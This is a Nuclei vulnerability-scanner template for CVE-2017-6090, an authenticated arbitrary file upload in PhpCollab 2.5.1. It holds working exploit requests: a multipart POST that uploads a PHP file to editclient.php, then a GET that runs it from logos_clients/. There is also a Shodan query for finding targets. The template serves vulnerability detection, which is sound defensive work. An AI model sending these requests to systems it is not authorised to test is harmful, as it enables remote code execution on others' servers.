nuclei-templates/http/cves/2017/CVE-2017-6090.yaml

59 lines
2.1 KiB
YAML

id: CVE-2017-6090
info:
name: PhpColl 2.5.1 Arbitrary File Upload
author: pikpikcu
severity: high
description: PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php.
remediation: |
Apply the latest patch or upgrade to a newer version of PhpColl to mitigate this vulnerability.
reference:
- https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/
- https://nvd.nist.gov/vuln/detail/CVE-2017-6090
- https://www.exploit-db.com/exploits/42934/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2017-6090
cwe-id: CWE-434
epss-score: 0.9726
epss-percentile: 0.99789
cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: phpcollab
product: phpcollab
shodan-query: http.title:"PhpCollab"
tags: cve2017,phpcollab,rce,fileupload,edb,cve,intrusive
http:
- raw:
- |
POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
-----------------------------154934846911423734231554128137
Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php"
Content-Type: application/x-php
<?php echo md5('phpcollab_rce');?>
-----------------------------154934846911423734231554128137--
- |
GET /logos_clients/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "48dbd2384cb6b996fa1e2855c7f0567f"
- type: status
status:
- 200
# digest: 490a00463044022016b0b0abbbe01e54f3e0114b3141859259732e1c90f4bd8fd90984ae01db450702203d79bde680ebdeda27a12b1be9cb9e4a52bbc90f23344a5227eba5f8a48d8509:922c64590222798bb761d5b6d8e72950